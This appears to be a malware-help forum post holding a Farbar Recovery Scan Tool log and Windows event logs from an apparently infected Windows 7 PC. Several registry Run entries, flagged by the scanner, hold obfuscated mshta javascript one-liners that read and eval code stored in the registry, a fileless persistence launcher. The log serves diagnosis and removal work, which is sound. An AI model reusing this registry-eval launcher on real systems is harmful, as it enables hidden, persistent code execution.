Description: Task Scheduling Error: m->NextScheduledEvent 477675

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


System errors:
=============
Error: (06/28/2015 11:13:13 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NVIDIA Update Service Daemon service failed to start due to the following error:
%%1069

Error: (06/28/2015 11:13:13 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The nvUpdatusService service was unable to log on as .\UpdatusUser with the currently configured password due to the following error:
%%1330

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (06/28/2015 11:11:08 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
SCDEmu

Error: (06/28/2015 11:10:04 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 10:59:54 AM on ‎6/‎28/‎2015 was unexpected.

Error: (06/28/2015 10:20:47 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (06/28/2015 08:41:48 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NVIDIA Update Service Daemon service failed to start due to the following error:
%%1069

Error: (06/28/2015 08:41:48 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The nvUpdatusService service was unable to log on as .\UpdatusUser with the currently configured password due to the following error:
%%1330

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (06/28/2015 08:39:46 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
SCDEmu

Error: (06/28/2015 08:04:59 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NVIDIA Update Service Daemon service failed to start due to the following error:
%%1069

Error: (06/28/2015 08:04:59 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The nvUpdatusService service was unable to log on as .\UpdatusUser with the currently configured password due to the following error:
%%1330

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).


Microsoft Office:
=========================
Error: (06/28/2015 11:08:23 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 479672

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 479672

Error: (06/28/2015 11:08:22 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 478673

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 478673

Error: (06/28/2015 11:08:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 477675

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 477675

Error: (06/28/2015 11:08:20 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second


==================== Memory info ===========================

Processor: Intel® Core™2 Quad CPU Q8200 @ 2.33GHz
Percentage of memory in use: 43%
Total physical RAM: 8191.05 MB
Available physical RAM: 4591.64 MB
Total Pagefile: 16380.3 MB
Available Pagefile: 12245.63 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:931.06 GB) (Free:375.97 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 8CDB8CDB)
Partition 1: (Active) - (Size=931.1 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=450 MB) - (Type=27)

==================== End of log ============================



#4 dwayne12

dwayne12
  • Topic Starter

  • Members
  • 19 posts

Posted 28 June 2015 - 10:46 AM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:28-06-2015
Ran by User (administrator) on USER-PC on 28-06-2015 11:38:04
Running from C:\Users\User\Downloads
Loaded Profiles: User &  (Available Profiles: User & UpdatusUser)
Platform: Windows 7 Ultimate Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\LogiShrd\LVMVFM\UMVPFSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(ABBYY) C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
() C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup 3.0\SymcPCCULaunchSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
() C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTray.exe
(Facebook Inc.) C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
() C:\Program Files (x86)\Standard Mouse Driver\Monitor.EXE
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
() C:\Program Files (x86)\Common Files\LogiShrd\LQCVFX\COCIManager.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe
() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\HEX\Adobe CEF Helper.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8306208 2009-10-21] (Realtek Semiconductor)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2399632 2011-04-13] (Microsoft Corporation)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [AdAwareTray] => C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTray.exe [7715160 2014-06-03] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [558496 2014-02-27] (Adobe Systems Incorporated)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2754704 2015-06-03] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [205336 2011-11-11] (Logitech Inc.)
HKLM-x32\...\Run: [hpqSRMon] => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe [150528 2008-07-22] (Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2014-10-11] (Apple Inc.)
HKLM-x32\...\Run: [Standard Mouse Driver] => C:\Program Files (x86)\Standard Mouse Driver\Monitor.exe [147456 2013-01-04] ()
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3727824 2015-06-16] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
HKLM-x32\...\Run: [**709fbb63<*>] => mshta javascript:uRKcL2L="B67grvqg";Ad5=new%20ActiveXObject("WScript.Shell");bHB62gNlR="xG4zWA";YPZk55=Ad5.RegRead("HKLM\\software\\Wow6432Node\\1838e86e\\8f497142");lNRnSl4h9="NmnkFeWdF6";eval(YPZk55 (the data entry has 21 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Run: [Facebook Update] => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-10-23] (Facebook Inc.)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Run: [**709fbb63<*>] => mshta javascript:B2cMtNA="mc";gk9=new%20ActiveXObject("WScript.Shell");L7qrLdY5="DalYL4qzu";LB7K1i=gk9.RegRead("HKCU\\software\\1838e86e\\8f497142");ZEZyWG2b="hEx";eval(LB7K1i);Nnuj7nMuz="w10FsX01a"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\Policies\Explorer: [NoThumbnailCache] 1
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: G - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: {981766c1-31e6-11e3-9d7c-f46d042209a7} - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: {98176738-31e6-11e3-9d7c-f46d042209a7} - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: {cc63ea89-0f29-11e1-b2ce-f46d042209a7} - E:\SETUP.EXE
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\...\MountPoints2: {de1a752a-f825-11e3-a0e8-f46d042209a7} - D:\INSTALL.EXE
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Facebook Update] => C:\Users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-10-23] (Facebook Inc.)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [**709fbb63<*>] => mshta javascript:B2cMtNA="mc";gk9=new%20ActiveXObject("WScript.Shell");L7qrLdY5="DalYL4qzu";LB7K1i=gk9.RegRead("HKCU\\software\\1838e86e\\8f497142");ZEZyWG2b="hEx";eval(LB7K1i);Nnuj7nMuz="w10FsX01a"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Policies\Explorer: [NoThumbnailCache] 1
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: G - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {981766c1-31e6-11e3-9d7c-f46d042209a7} - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {98176738-31e6-11e3-9d7c-f46d042209a7} - G:\Setup.exe
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {cc63ea89-0f29-11e1-b2ce-f46d042209a7} - E:\SETUP.EXE
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {de1a752a-f825-11e3-a0e8-f46d042209a7} - D:\INSTALL.EXE
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2012-05-08]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
ShellIconOverlayIdentifiers: [SmartFTP Drop] -> {EA5A76F7-8138-4B53-B0F5-ADCC730CAFBD} => C:\Program Files\SmartFTP Client\sfShellTools.dll [2012-01-24] (SmartSoft Ltd.)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ca.msn.com/?rd=1
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = https://ca.yahoo.com?fr=hp-avast&type=avastbcl
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ca.msn.com/?rd=1
HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Bar = https://ca.yahoo.com?fr=hp-avast&type=avastbcl
URLSearchHook: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 - (No Name) - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - No File
URLSearchHook: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 - (No Name) - {167d9323-f7cc-48f5-948a-6f012831a69f} - No File
URLSearchHook: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 - (No Name) - {1392b8d2-5c05-419f-a8f6-b9f15a596612} - No File
URLSearchHook: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 - (No Name) - {167d9323-f7cc-48f5-948a-6f012831a69f} - No File
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKLM -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKLM -> {7BE09713-A09C-4448-85E9-761960ED1D82} URL =
SearchScopes: HKLM-x32 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = https://ca.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM-x32 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = https://ca.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM-x32 -> {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1060933
SearchScopes: HKU\.DEFAULT -> DefaultScope {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> DefaultScope {FF09073E-9AD2-4BD0-B868-6D9BEC62C033} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {7BE09713-A09C-4448-85E9-761960ED1D82} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> {FF09073E-9AD2-4BD0-B868-6D9BEC62C033} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {FF09073E-9AD2-4BD0-B868-6D9BEC62C033} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {77AA745B-F4F8-45DA-9B14-61D2D95054C8} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {7BE09713-A09C-4448-85E9-761960ED1D82} URL =
SearchScopes: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {FF09073E-9AD2-4BD0-B868-6D9BEC62C033} URL = https://www.google.com/search?q={searchTerms}
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} ->  No File
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} ->  No File
Toolbar: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> No Name - {1392B8D2-5C05-419F-A8F6-B9F15A596612} -  No File
Toolbar: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000 -> No Name - {167D9323-F7CC-48F5-948A-6F012831A69F} -  No File
Toolbar: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> No Name - {1392B8D2-5C05-419F-A8F6-B9F15A596612} -  No File
Toolbar: HKU\S-1-5-21-1557550123-2840590655-2789666575-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> No Name - {167D9323-F7CC-48F5-948A-6F012831A69F} -  No File
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} https://fpdownload.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} -  No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{CFE71FFE-A42B-4FF5-8BE2-630EEA744AFD}: [DhcpNameServer] 192.168.2.1

FireFox:
========
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\73ou9irr.default-1393877900780
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_17_0_0_188.dll [2015-06-04] ()
FF Plugin: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2011-06-19] (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-22] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_188.dll [2015-06-04] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1218158.dll [2015-04-27] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @microsoft.com/GENUINE -> C:\Windows\system32\Wat\npWatWeb.dll [2011-06-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [2011-11-05] (Nexon)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2014-07-02] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2014-07-02] (NVIDIA Corporation)
FF Plugin-x32: @ogplanet.com/npOGPPlugin -> C:\Windows\system32\npOGPPlugin.dll No File
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin-x32: @qq.com/TXSSO -> C:\Program Files (x86)\Common Files\Tencent\TXSSO\1.2.1.94\Bin\npSSOAxCtrlForPTLogin.dll [2013-01-24] (Tencent)
FF Plugin-x32: @tiancity.com/NxGame -> C:\ProgramData\Tiancity\NGM\npNxGameCN.dll [2013-11-13] (Nexon)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-15] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-15] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-06-07] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-05-11] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-22] (Adobe Systems)
